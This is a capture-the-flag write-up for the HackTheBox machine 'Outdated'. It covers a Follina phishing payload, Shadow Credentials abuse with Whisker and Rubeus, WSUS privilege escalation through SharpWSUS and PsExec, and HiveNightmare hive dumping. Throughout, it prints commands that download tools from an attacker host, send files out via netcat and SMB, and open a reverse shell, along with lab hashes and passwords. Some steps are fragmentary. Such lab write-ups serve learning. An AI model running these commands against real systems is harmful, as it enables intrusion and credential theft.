HTB-OUTDATED
Summary
This machine was initially published with some unintended ways to root (i.e zerologon), and later those had been patched. The intended PE exploit is via WSUS.
This machine features several fairly new exploits such as follina, wsus etc. But in general, it’s also a bit unstable. So, exploit with patience.
Scanning
.
Enum
From the above, the target might be another exercise on AD, ldap, kerberos. Let’s find some more info.
>
enum4linux outdated.htb
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
>
smbclient -N -L outdated.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
There is a Shares folder. Connecting to it, we can find more info.
>
smbclient -N \\\\outdated.htb\\Shares
smb: \> ls
. D 0 Mon Jun 20 11:01:33 2022
.. D 0 Mon Jun 20 11:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 11:00:32 2022
9116415 blocks of size 4096. 1440211 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (33.8 KiloBytes/sec) (average 33.8 KiloBytes/sec)
User: btables
We found a doc NOC_Reminder.pdf. Reading the content, we learnt that there are unpatched vulnerabilities and there is a valid email address at itsupport@outdated.htb, who checks email for links regularly.
Also, we learnt that there are some vulnerabilities unpatched, and one of them is exploitable via email: CVE-2022-30190
CVE-2022-30190 is also known as Follina, which is a relatively recent exploit on MS word/rtf docs, in which you can utilize a rarely used feature called Microsoft Support Diagnostics Tool (MSDT) that downloads malicious scripts via an embedded link. For more detail, check here: https://logrhythm.com/blog/detecting-follina-cve-2022-30190-microsoft-office-zero-day-exploit/
To exploit this, i used this exploit: https://github.com/JohnHammond/msdt-follina
Generate Payload
Use some code based on John Hammond’s POC. This POC does a lot of things, generating a Word document that will request the HTML payload, and even providing the webserver and catching the reverse shell. I’ll use just a couple lines that generate that HTML payload:
.
It’s important to note that the payload must be padded out to larger than 4096 bytes to bypass user activity.
I’ll generate this payload and save it into a file I’ll then serve with Python’s webserver.
Trigger Exploit
I’ll send the link in an email to itsupport@outdated.htb
using swaks
:
.
If this works, the user will click the link, requesting the msdt.html
page, which I’ll serve, and moments later, I should get a request to upload nc64.exe
(I’ll make sure there’s a copy in my web root) and then a shell on TCP 443. It works just like expected. Two get requests:
.
Then a shell:
User: sflowers
Now, we can collect AD information as btables, which is a domain user.
Upload SharpBound.exe to the machine and start collecting domain info.
# download SharpHound to the target
> certutil -urlcache -f http://10.10.14.10:8000/SharpHound.exe SharpHound.exe
# run SharpHound
> SharpHound.exe -c All
# send the result back
nc64.exe 10.10.14.10 5555 < 20241218170837_BloodHound.zip
> nc -nlvp 5555 > output.zip
or we use
serving smb
# impacket-smbserver -smb2support share . -user puck -pass puckpuck
on client
c:\temp>net use \\10.10.14.10\share /u:puck puckpuck
net use \\10.10.14.10\share /u:puck puckpuck
The command completed successfully.
c:\temp>copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
1 file(s) copied.
—
Bloodhound Analyse the output finds that btables belongs to the group itstaff, and itstaff has the privilege to AddKeyCredentialLink to the user sflowers, who has psremote access to the DC.
The members of the group ITSTAFF@OUTDATED.HTB have the ability to write to the “msds-KeyCredentialLink” property on SFLOWERS@OUTDATED.HTB. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.
To abuse this privilege, use Whisker.
You may need to authenticate to the Domain Controller as a member of ITSTAFF@OUTDATED.HTB if you are not running a process as a member
Whisker.exe add /target:<TargetPrincipal>
or abuse this privilege, use pyWhisker.
pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"
Shortest Paths to Unconstrained Delegation Systems
To get user sflowers, we need to utilise a technique called ShadowCredentials, for more detail, refer to this: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
Basically, we can add new properties to the user sflowers, so, we can add a new property as a valid credential for the user sflowers to authenticate, and we can then use the new credential we created to pull the TGT of sflowers, which we can use for persistent access as sflowers.
To do so, we need some windows exploit binaries, which can be downloaded from here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Note that Whisker needs to be self compiled or decompressed from here: https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
# upload binaries
> certutil.exe -urlcache -f http://10.10.14.10:8000/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://10.10.14.10:8000/Rubeus.exe Rubeus.exe
# run whisker to add a new property as a new credential for sflowers
> Whisker.exe add /target:sflowers
Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"81IrT8oSxfA0pBoe" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
thus
running this Rubeus.exe asktgt /user:sflowers /certificate:MII... command outputs:
At the end of whisker, it will generate a Rubeus command to pull the TGT of sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
Note the
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5
, this can be used as the
ntlm
hash for the user sflowers.
Now, we can PSRemote into the target as sflowers using the ntlm hash we obtained via shadow credential
>
evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
PE: WSUS
Perform enum using winpeas, we found that there is a wsus server configured that is using non-https.
[+] Checking WSUS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
WSUS is using http: http://wsus.outdated.htb:8530
[i] You can test https://github.com/pimps/wsuxploit to escalate privileges
But UseWUServer is equals to , so it may work or not
We continue checking for several registry values
.
.
a non-https wsus server and UseWUServer value is 1, the machine is vulnerable to wsus attack.
The most recent is the SharpWSUS post, which gives a really nice overview of how WSUS servers work to provide updates to networks of different size and complexity.
It also has a link to a Github repo with the tool, which I’ll build in Visual Studio just like Whisker above, and upload to DC:
*Evil-WinRM* PS C:\programdata> upload SharpWSUS.exe sw.exe
Info: Uploading SharpWSUS.exe to sw.exe
Data: 65536 bytes of 65536 bytes copied
Info: Upload successful!
Identify WSUS
The registry key HKLM:\software\policies\microsoft\windows\WindowsUpdate
will show the WSUS server in use. From client:
PS C:\> Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
And from the DC:
*Evil-WinRM* PS C:\> get-itemproperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
SharpWSUS.exe
will do this as well:
*Evil-WinRM* PS C:\programdata> .\sw.exe locate
..snip..
[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530
[*] Locate complete
From client, ping
will show that it’s the same host as the DC:
PS C:\> ping wsus.outdated.htb
Resolve-DNSName
will also show this (if run from DC it needs -Server
to work):
*Evil-WinRM* PS C:\programdata> Resolve-DNSName -Name wsus.outdated.htb -Type A -Server 127.0.0.1
Name Type TTL Section NameHost
---- ---- --- ------- --------
wsus.outdated.htb CNAME 3600 Answer dc.outdated.htb
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 10.10.11.175
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 172.16.20.1
WSUS Information
SharpWSUS.exe
will also give information about the clients using the WSUS:
*Evil-WinRM* PS C:\programdata> .\sw.exe inspect
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Inspect WSUS Server
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.652, 7/22/2022 5:01:44 AM
####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------
####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers
[*] Inspect complete
It only shows the DC, but that’s where I want SYSTEM anyway.
Exploit
PsExec
WSUS will only run signed Microsoft binaries. As I have no good way to get a MS signing certificate, I’ll have to use something legit. The article suggests the Sysintenals tool, PSExec. I’ll download Sysinternals, copy PsExec.exe
to my webserver, and upload it:
*Evil-WinRM* PS C:\programdata> upload PsExec64.exe \programdata\ps.exe
Info: Uploading PsExec64.exe to \programdata\ps.exe
Data: 685960 bytes of 685960 bytes copied
Info: Upload successful!
Create/Approve Update
I’ll create an update using SharpWSUS.exe
. The blog post shows adding an administrator, but I’ll just go for a reverse shell using nc64.exe
. The /args
for PsExec are -accepteula
so that it doesn’t pop a box and wait for a click, -s
to run as system, and -d
to return immediately. The /title
is arbitrary.
*Evil-WinRM* PS C:\programdata> .\sw.exe create /payload:"C:\programdata\ps.exe" /args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445" /title:"CVE-2022-30190"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\programdata\ps.exe
[*] Arguments: -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
[*] Arguments (HTML Encoded): -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 44
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 45
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
I need to approve that Update, using the syntax given in the output (/groupname
is arbitrary):
*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Approve Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update
[*] Approve complete
It takes about a minute for this to fire, and it fails occasionally. If it fails, I’ll try again, but eventually there’s a connection at nc
:
Beyond Root – Skipped Steps
PyWhisker Background
With a shell in the Hyper-V Container, I built an EXE version of Whisker. There’s also a Python version of the exploit, pywhisker. It does the same thing, but I’ll execute it from my attack station. The problem is, that to run it I’ll need some creds for the domain. This wasn’t an issue with the EXE version, as it was running in the context of btables, and used what Windows had cached for the user to auth. But to run it from my VM, I’ll need creds.
The Author’s intended path for this box was to exploit HiveNightmare to get creds for btables, and then use those to run pywhisker. That wasn’t necessary, but I’ll still show it here.
HiveNightmare
Background
In July 2021, a researcher noticed that the permissions for the raw registry hive files was misconfigured starting in Windows 10 build 1809, which first released to the public in October 2018. This got the designation CVE-2021-36934, as well as the names HiveNightmare and SeriousSAM.
icacls
shows that the SAM
file is readable by all users:
C:\>icacls C:\windows\system32\config\SAM
C:\windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
Get Hive Files
Interestingly, I still can’t just copy the files. But a tool like HiveNightmare from researcher GossiTheDog will pull it for me. I’ll grab the compiled EXE from the release page.
I’ll upload it using wget
and run it:
PS C:\ProgramData> wget 10.10.14.6/HiveNightmare.exe -outfile hn.exe
PS C:\ProgramData> ./hn
HiveNightmare v0.6 - dump registry hives as non-admin users
Specify maximum number of shadows to inspect with parameter if wanted, default is 15.
Running...
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM
Success: SAM hive from 2022-08-02 written out to current working directory as SAM-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SECURITY
Success: SECURITY hive from 2022-08-02 written out to current working directory as SECURITY-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM
Success: SYSTEM hive from 2022-08-02 written out to current working directory as SYSTEM-2022-08-02
Assuming no errors above, you should be able to find hive dump files in current working directory.
It does create copies of the hives in the current directory:
PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/15/2022 6:30 PM Microsoft
d----- 6/15/2022 9:24 AM Microsoft OneDrive
d----- 6/15/2022 9:40 AM Packages
d----- 8/1/2022 7:41 PM regid.1991-06.com.microsoft
d----- 12/7/2019 1:14 AM SoftwareDistribution
d----- 4/9/2021 6:54 AM ssh
d----- 6/15/2022 9:53 AM USOPrivate
d----- 12/7/2019 1:14 AM USOShared
-a---- 8/3/2022 2:10 PM 227328 hn.exe
-a---- 8/3/2022 2:08 PM 45272 nc64.exe
-a---- 8/3/2022 2:10 PM 65536 SAM-2022-08-02
-a---- 8/3/2022 2:10 PM 32768 SECURITY-2022-08-02
-a---- 8/3/2022 2:10 PM 11534336 SYSTEM-2022-08-02
Exfil
To exfil these, I’ll start an SMB server on my box:
I’ll connect to it from Outdated, and then copy the files:
PS C:\ProgramData> net use \\10.10.14.10\share /u:puck 0puckpuck
The command completed successfully.
PS C:\ProgramData> copy *-12-14 \\10.10.14.10\share\
PS C:\ProgramData> copy *-13 \\10.10.14.10\share\
Dump Hashes
With access to these hives, secretsdump.py
will return the hashes:
This also includes a plaintext “DefaultPassword” for an unknown user of “5myBPLPDKT3Bfq”. That suggests it’s probably a domain user, and not a local user.
crackmapexec
shows these creds are good for btables:
Remote Shadow Credentials
PyWhisker
With creds, I can try to remotely run PyWhisker. It fails:
This shows that the LDAP bind failed, TLS is required. Adding --use-ldaps
fixes it:
sflowers has no shadow credentials. I’ll add one:
PKINITtools
The PyWhisker output suggests using PKINITtools to get a TGT. I’ll do that:
.
.
For the last step, I’ll need to run the getnthash.py
script. I had some issues on my system getting the Python dependencies to run, so I just created a virtual environment (python -m venv venv
, and then source venv/bin/activate
) and installed the requirements again in there (pip install -r requirements.txt
). Then it worked:
With that hash, I can get an Evil-WinRM session
.
Get the hashes
add user
then secretsdump
That was Fun!